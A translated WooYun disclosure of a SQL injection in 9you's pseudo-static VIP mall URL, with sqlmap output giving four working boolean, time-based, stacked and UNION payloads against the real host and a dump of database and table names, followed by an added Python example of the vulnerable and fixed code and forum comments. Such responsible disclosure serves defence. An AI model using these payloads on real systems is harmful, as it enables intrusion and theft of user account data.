
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0162489

Title: Pseudo-static SQL injection at 久游网 (9you) involving the account and password information of 6.43 million users

Vendor: 久游网

Author: 小川

Submitted: 2015-12-18 17:32

Fixed: 2016-02-01 19:48

Published: 2016-02-01 19:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-18: Details sent to the vendor; awaiting vendor handling
2015-12-18: Vendor confirmed; details visible to the vendor only
2015-12-28: Details opened to core white hats and experts in the relevant field
2016-01-07: Details opened to regular white hats
2016-01-17: Details opened to intern white hats
2016-02-01: Details opened to the public

Brief description:

Whenever 9you comes up, I start humming to myself: "The boundless horizon is my love......"

Detailed description:

ragecomic.png

Proof of vulnerability:

web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] information_schema
[*] passport
[*] test
[*] vip
[*] vip_new
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND 7940=7940 AND (6013=6013.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76);(SELECT * FROM (SELECT(SLEEP(5)))WpLQ)#.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND (SELECT * FROM (SELECT(SLEEP(5)))Lgns) AND (2756=2756.html
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786a71,0x506b5059486c4e537979,0x7176627171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- .html
---
Database: passport
[68 tables]
+-------------------------+
| au_cdk |
| au_cdk_type |
| au_itemsend |
| disk_usage_master |
| disk_usage_slave |
| email_sign |
| fast_reglog |
| get_username_paycard |
| get_username_registinfo |
| gmtools_account_sign |
| log_adult |
| log_appeal |
| log_appeal_rest |
| log_aupwd |
| log_aupwd_rest |
| log_email |
| log_email_yahoo |
| log_getpasswd |
| log_idcard |
| log_idcard_email |
| log_info_speed |
| log_login |
| log_matrixcard_lost |
| log_matrixcard_replace |
| log_matrixcard_set |
| log_matrixcard_unbind |
| log_nickname_speed |
| log_password_email |
| log_password_modify |
| log_password_vipcode |
| log_profile |
| log_propertylockreset |
| log_provip |
| log_provip_rest |
| log_qa |
| log_regist_reset |
| log_securecode |
| log_sim |
| log_token |
| log_username_mobile |
| lx_code_resend_log |
| lx_code_send_cpl |
| lx_code_send_log |
| lx_fullcode_limit |
| lx_ticket |
| m818_user_bind |
| m818_user_bind_log |
| matrixcard_info |
| mobile_checkcode |
| mobile_checkcode_vip |
| mobile_sendmsg |
| mobile_user_bind |
| mobile_user_bind_email |
| mobile_user_bind_log |
| mobile_user_bind_regist |
| ms_mobile_user |
| sim_bind |
| sim_lost |
| slave_check |
| sleep_user_au_log |
| sleep_user_pwd |
| token_info |
| token_unbind |
| user_bind_ydcy |
| user_bind_ydcy_err |
| user_login_info |
| voidnickname |
| ydcy_addstorage_log |
+-------------------------+

Suggested fix:

Hand on heart, I absolutely did not dump the database, and as for the data in the vip database, I didn't even look at it. Just run the parameter through intval.
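The fix the report recommends, as an added example that is not code from the report or from 9you (Python with sqlite3 standing in for the PHP/MySQL application; the route pattern follows the reported URL, while the table name, columns and sample rows are assumptions). The vulnerable form shows why the reported boolean-based payload works on a pseudo-static URL, and the hardened form enforces an integer (the intval() idea) and binds it as a query parameter, which is what actually removes the injection.

```python
import re
import sqlite3

# The pseudo-static route from the report: the value after /game_id/ ends in
# ".html" and is used as the query parameter. Table name and columns are
# assumptions for this example; the real schema is not on the page.
ROUTE_RE = re.compile(r"^/vip/mall/index/game_id/(?P<game_id>.+)\.html$")

def make_db():
    """Constructed in-memory sample table standing in for the vip mall data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mall_game (game_id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO mall_game VALUES (?, ?)",
                     [(76, "game-76"), (77, "game-77")])
    return conn

def extract_game_id(path):
    """Return the raw game_id segment of a rewritten URL, or None."""
    m = ROUTE_RE.match(path)
    return m.group("game_id") if m else None

def lookup_vulnerable(conn, path):
    """Before: the URL segment is spliced into the SQL text. A segment such as
    '76) AND 7940=7940 AND (6013=6013' closes the application's own
    parenthesis, which is the boolean-based blind shape sqlmap reported."""
    raw = extract_game_id(path)
    sql = "SELECT name FROM mall_game WHERE (game_id=%s)" % raw
    return [row[0] for row in conn.execute(sql)]

def lookup_hardened(conn, path):
    """After: require a decimal integer (the intval() the report recommends)
    and bind it as a parameter, so the segment can never become SQL syntax."""
    raw = extract_game_id(path)
    if raw is None or not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError("game_id must be a decimal integer")
    game_id = int(raw)
    rows = conn.execute("SELECT name FROM mall_game WHERE (game_id=?)", (game_id,))
    return [row[0] for row in rows]

def rejects(conn, path):
    """True when the hardened lookup refuses the path outright."""
    try:
        lookup_hardened(conn, path)
        return False
    except ValueError:
        return True
```

In the vulnerable form a true condition keeps the row and a false one drops it, which is the yes/no oracle a blind injection needs; the hardened form never evaluates the condition at all.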

Copyright notice: when reposting, please credit the source: 小川@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-12-18 22:53

Vendor reply:

Scanner or by hand? Pretty impressive that you even found this one.
Definitely 20 points.

Latest status:

None yet


Comments:

  1. 2015-12-18 17:40 | 牛 小 帅 ( regular white hat | Rank:1015 vulns:233 | 1. The most handsome man on WooYun ...)

    Quietly taking the first floor

  2. 2015-12-18 17:53 | px1624 ( regular white hat | Rank:1072 vulns:181 | px1624)

    Having a magic tool is awesome!

  3. 2015-12-18 19:14 | k0_pwn ( intern white hat | Rank:55 vulns:12 | focused and free)

    It's the end of the year, and 川神's rage comics are getting a new issue

  4. 2015-12-18 22:22 | 菜菜 ( intern white hat | Rank:83 vulns:7 | cnidc.hk:500:D5B9985DFBA5FE8A050A39C249C...)

    川神

  5. 2015-12-19 09:26 | 命运 ( passerby | Rank:3 vulns:2 | I'm here on WooYun to show off the floor of my IQ~~)

    Hoping it gets disclosed soon so I can see the rage comic

  6. 2015-12-19 10:27 | hecate ( regular white hat | Rank:722 vulns:109 | ® Senior Security Engineer | WooYun certified √)

    Once you've hit enough sites, you naturally get a feel for where the injections are

  7. 2015-12-19 14:21 | kevinchowsec ( intern white hat | Rank:51 vulns:16 | Zhou Kaiwen, infosec enthusiast.)

    The vendor, in endless melancholy, sings back: "At the foot of the rolling green hills the flowers are in bloom..."

  8. 2015-12-19 14:59 | 小川 certified white hat ( core white hat | Rank:1451 vulns:223 | A man dedicated to turning WooYun into a comedy forum)

    @kevinchowsec What kind of song is the swingiest of them all?

  9. 2015-12-19 15:24 | Mr.Wang ( passerby | no vulnerabilities published yet | Seeking a breakthrough between black and white.)

    Bro, add me on QQ, 2573465610, I've got something to discuss.

  10. 2015-12-19 17:35 | whynot ( regular white hat | Rank:553 vulns:100 | Thawing the glacier for you, giving up the world for you, why not)

    @小川 Another episode of Wang Nima has started, so diao

  11. 2015-12-19 22:55 | Tioyer ( intern white hat | Rank:34 vulns:10 | New here, please go easy on me, masters!)

    川神, could I get your QQ contact?

  12. 2015-12-20 19:05 | sauren ( intern white hat | Rank:88 vulns:27 | DOTA every day, happiness for you, me and everyone~)

    I'm here for 川神's rage comic

  13. 2015-12-25 14:41 | 衣其 ( passerby | Rank:8 vulns:2 | just a newbie)

    Following for updates

  14. 2016-01-07 23:01 | px1624 ( regular white hat | Rank:1072 vulns:181 | px1624)

    Sina's scanner is insanely good

  15. 2016-01-08 14:27 | 路人毛 ( intern white hat | Rank:64 vulns:25 | ../)

    @Mr.Wang Discuss my ass~ black-market dealer